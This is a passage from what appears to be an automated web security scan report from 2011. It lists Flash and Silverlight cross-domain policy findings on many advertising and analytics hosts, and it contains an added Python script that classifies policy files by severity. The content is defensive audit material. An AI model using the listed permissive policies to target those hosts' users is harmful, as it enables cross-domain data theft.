Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.covergirl.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 12:19:16 GMT
Accept-Ranges: bytes
ETag: "03a528e8e56cc1:295a5"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:26 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="cgmakeover.appspot.com"/>
<allow-http-request-headers-from domain="
...[SNIP]...

5. Silverlight cross-domain policy
There are 23 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
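The Flash crossdomain.xml findings in section 4 and the Silverlight policy background above both rest on the same three-step classification: an entry that admits any domain is High, a wildcard entry is Low, and a list of specific hosts is Information. The Python script below is an added example, not part of the scanner output or of the scanner vendor's code; it re-derives that classification offline for both file types, so a policy captured in this report can be re-checked after remediation without a browser plugin. It also flags two things the report's issue text does not call out: secure="false" entries, which several captured Flash policies set, and http-request-headers="*" in Silverlight policies. The embedded sample policies are constructed and modelled on the captures above; the host names in them are placeholders, and the function names are this example's own.

```python
# Added example: offline classifier for Flash and Silverlight cross-domain
# policies, using this report's severity scale. Not part of the scanner output.
import xml.etree.ElementTree as ET
from typing import List, Tuple

HIGH, LOW, INFO = "High", "Low", "Information"
_RANK = {INFO: 0, LOW: 1, HIGH: 2}


def _summarise(found: List[Tuple[str, str]]) -> Tuple[str, List[str]]:
    """Overall severity is the worst single entry (Information if none)."""
    severity = max((lvl for lvl, _ in found), key=_RANK.__getitem__, default=INFO)
    return severity, [reason for _, reason in found]


def audit_crossdomain(xml_text: str, served_over_https: bool = False) -> Tuple[str, List[str]]:
    """Classify a Flash crossdomain.xml. Returns (severity, reasons)."""
    try:
        # ElementTree does not fetch the SYSTEM DTD, so this runs offline;
        # for bulk scanning of untrusted hosts prefer defusedxml.
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # Flash Player discards a malformed policy, so nothing is granted.
        return INFO, [f"unparseable policy: {exc}"]
    found = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            found.append((HIGH, "allows access from any domain"))
        elif domain.startswith("*"):
            found.append((LOW, f"wildcard domain {domain!r}"))
        else:
            found.append((INFO, f"specific domain {domain!r}"))
        # secure="false" on an HTTPS host lets a SWF loaded over plain HTTP
        # read the HTTPS responses, undoing the transport protection.
        if served_over_https and el.get("secure", "true").lower() == "false":
            found.append((LOW, f'secure="false" for {domain!r} on an HTTPS host'))
    return _summarise(found)


def audit_clientaccesspolicy(xml_text: str) -> Tuple[str, List[str]]:
    """Classify a Silverlight clientaccesspolicy.xml. Returns (severity, reasons)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return INFO, [f"unparseable policy: {exc}"]
    found = []
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        if allow is None:
            continue
        if allow.get("http-request-headers") == "*":
            found.append((INFO, "callers may send arbitrary request headers"))
        for dom in allow.iter("domain"):
            uri = dom.get("uri", "")
            host = uri.split("://", 1)[-1]  # "http://*" -> "*"
            if host == "*":
                found.append((HIGH, f"allows access from any domain ({uri!r})"))
            elif host.startswith("*"):
                found.append((LOW, f"wildcard domain {uri!r}"))
            else:
                found.append((INFO, f"specific domain {uri!r}"))
        for res in policy.iter("resource"):
            found.append((INFO, f"grants path {res.get('path')!r}, "
                                f"include-subpaths={res.get('include-subpaths')}"))
    return _summarise(found)


# Constructed samples modelled on the captures in this report; the host
# names are placeholders, not the real policies.
FLASH_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.example.com" secure="false"/>
  <allow-access-from domain="cdn.example.net"/>
</cross-domain-policy>"""

SILVERLIGHT_SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<access-policy><cross-domain-access><policy>
  <allow-from http-request-headers="*"><domain uri="*"/></allow-from>
  <grant-to><resource path="/" include-subpaths="true"/></grant-to>
</policy></cross-domain-access></access-policy>"""

# A DOCTYPE pasted from a browser's rendered view is not well-formed XML.
BROKEN_SAMPLE = """<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy><allow-access-from domain="www.example.org"/></cross-domain-policy>"""


def run_examples() -> dict:
    """Classify the three samples; returns {name: (severity, reasons)}."""
    return {
        "flash": audit_crossdomain(FLASH_SAMPLE, served_over_https=True),
        "silverlight": audit_clientaccesspolicy(SILVERLIGHT_SAMPLE),
        "broken": audit_crossdomain(BROKEN_SAMPLE),
    }
```

Calling run_examples() classifies the Flash sample as Low (wildcard plus secure="false" on an HTTPS host), the Silverlight sample as High (uri="*" with any request header allowed, granted on "/" with subpaths), and the malformed sample as Information with an "unparseable policy" reason. Two points the classification does not capture on its own: Silverlight falls back to crossdomain.xml when no clientaccesspolicy.xml is served, so a permissive Flash policy also widens the Silverlight trust boundary, and audit both files on every host; and a policy that parses cleanly but lists a domain the organisation does not control (for example a partner's wildcard) is still a trust decision that needs a human review, which is what the remediation text above asks for.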


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://ads1.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 348
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 01 May 2012 16:29:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www425
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Omniture DC/2.0.0
xserver: www369
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omni.csc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www366
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www166
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

5.13. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:34:25 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51825
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.15. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.16. http://stats.deloitte.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
xserver: www384
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
xserver: www93
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.18. http://cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:43 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml